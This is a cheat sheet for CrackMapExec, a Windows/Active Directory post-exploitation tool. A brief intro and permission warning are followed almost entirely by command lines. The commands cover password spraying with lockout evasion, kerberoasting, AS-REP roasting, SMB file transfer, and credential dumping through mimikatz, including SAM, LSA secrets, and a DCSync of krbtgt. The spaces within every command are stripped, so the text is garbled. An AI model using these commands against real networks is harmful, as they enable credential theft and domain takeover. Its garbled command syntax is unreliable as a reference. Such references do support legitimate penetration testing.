CrackMapExec (CME) is a post-exploitation tool designed for penetration testing and red team operations in Windows/Active Directory environments. It's often described as a "Swiss Army knife" for network penetration testing, allowing for enumeration, credential testing, and command execution across multiple protocols.
⚠️ Warning: CrackMapExec is a security testing tool that should only be used in environments where you have explicit permission to do so.
# Single targetcrackmapexecsmb192.168.1.100
# Multiple targetscrackmapexecsmb192.168.1.100,192.168.1.101
# IP rangecrackmapexecsmb192.168.1.1-255
# CIDR notationcrackmapexecsmb192.168.1.0/24
# From filecrackmapexecsmbtargets.txt
# Single username and passwordcrackmapexecsmb192.168.1.0/24-uadministrator-p'Password123'# Multiple usernamescrackmapexecsmb192.168.1.0/24-uadministrator,user1-p'Password123'# Multiple passwordscrackmapexecsmb192.168.1.0/24-uadministrator-p'Password123','Welcome1'# From filescrackmapexecsmb192.168.1.0/24-uusers.txt-ppasswords.txt
# List sharescrackmapexecsmb192.168.1.0/24-uadministrator-p'Password123'--shares
# List logged-on userscrackmapexecsmb192.168.1.0/24-uadministrator-p'Password123'--loggedon-users
# List domain userscrackmapexecsmb192.168.1.0/24-uadministrator-p'Password123'--users
# List domain groupscrackmapexecsmb192.168.1.0/24-uadministrator-p'Password123'--groups
# List local groupscrackmapexecsmb192.168.1.0/24-uadministrator-p'Password123'--local-groups
# Get domain password policycrackmapexecsmb192.168.1.0/24-uadministrator-p'Password123'--pass-pol
# Check for SMB signingcrackmapexecsmb192.168.1.0/24--gen-relay-listrelay_targets.txt
# List files in sharecrackmapexecsmb192.168.1.100-uadministrator-p'Password123'--spiderC$--pattern'*.txt'# Download filecrackmapexecsmb192.168.1.100-uadministrator-p'Password123'--get-file'C:\temp\file.txt'/tmp/file.txt
# Upload filecrackmapexecsmb192.168.1.100-uadministrator-p'Password123'--put-file/tmp/file.txt'C:\temp\file.txt'
# Get domain informationcrackmapexecldap192.168.1.0/24-uadministrator-p'Password123'--domain
# List domain userscrackmapexecldap192.168.1.0/24-uadministrator-p'Password123'--users
# List domain groupscrackmapexecldap192.168.1.0/24-uadministrator-p'Password123'--groups
# List domain computerscrackmapexecldap192.168.1.0/24-uadministrator-p'Password123'--computers
# Get domain password policycrackmapexecldap192.168.1.0/24-uadministrator-p'Password123'--pass-pol
# Get domain trustscrackmapexecldap192.168.1.0/24-uadministrator-p'Password123'--trusts
# Search for specific attributescrackmapexecldap192.168.1.0/24-uadministrator-p'Password123'-Mmaq-oATTRIBUTES=description
# Search for unconstrained delegationcrackmapexecldap192.168.1.0/24-uadministrator-p'Password123'--trusted-for-delegation
# Search for constrained delegationcrackmapexecldap192.168.1.0/24-uadministrator-p'Password123'--allowed-to-delegate
# Search for ASREP roastable userscrackmapexecldap192.168.1.0/24-uadministrator-p'Password123'--asreproastoutput.txt
# Search for kerberoastable userscrackmapexecldap192.168.1.0/24-uadministrator-p'Password123'--kerberoastingoutput.txt
# Check MSSQL accesscrackmapexecmssql192.168.1.0/24-usa-p'Password123'# List databasescrackmapexecmssql192.168.1.0/24-usa-p'Password123'-q'SELECT name FROM master.dbo.sysdatabases'
# List available modulescrackmapexec<protocol>--list-modules
# Get module optionscrackmapexec<protocol>-M<module>--options
# Use modulecrackmapexec<protocol><target>-u<username>-p<password>-M<module>-oOPTION1=value1OPTION2=value2
# Dump credentialscrackmapexecsmb192.168.1.0/24-uadministrator-p'Password123'-Mmimikatz-oCOMMAND='sekurlsa::logonpasswords'# Get LSA secretscrackmapexecsmb192.168.1.0/24-uadministrator-p'Password123'-Mmimikatz-oCOMMAND='lsadump::secrets'# Get SAM databasecrackmapexecsmb192.168.1.0/24-uadministrator-p'Password123'-Mmimikatz-oCOMMAND='lsadump::sam'# Get DCSynccrackmapexecsmb192.168.1.0/24-uadministrator-p'Password123'-Mmimikatz-oCOMMAND='lsadump::dcsync /domain:domain.local /user:krbtgt'
# Spray single password against multiple userscrackmapexecsmb192.168.1.0/24-uusers.txt-p'Spring2023!'# Spray multiple passwords against single usercrackmapexecsmb192.168.1.0/24-uadministrator-ppasswords.txt
# Spray with jitter to avoid lockoutscrackmapexecsmb192.168.1.0/24-uusers.txt-p'Spring2023!'--continue-on-success--fail-limit1--jitter10
# List hostscrackmapexecsmb--database-L
# List credentialscrackmapexecsmb--database-C
# Use credentials from databasecrackmapexecsmb192.168.1.0/24--database-id1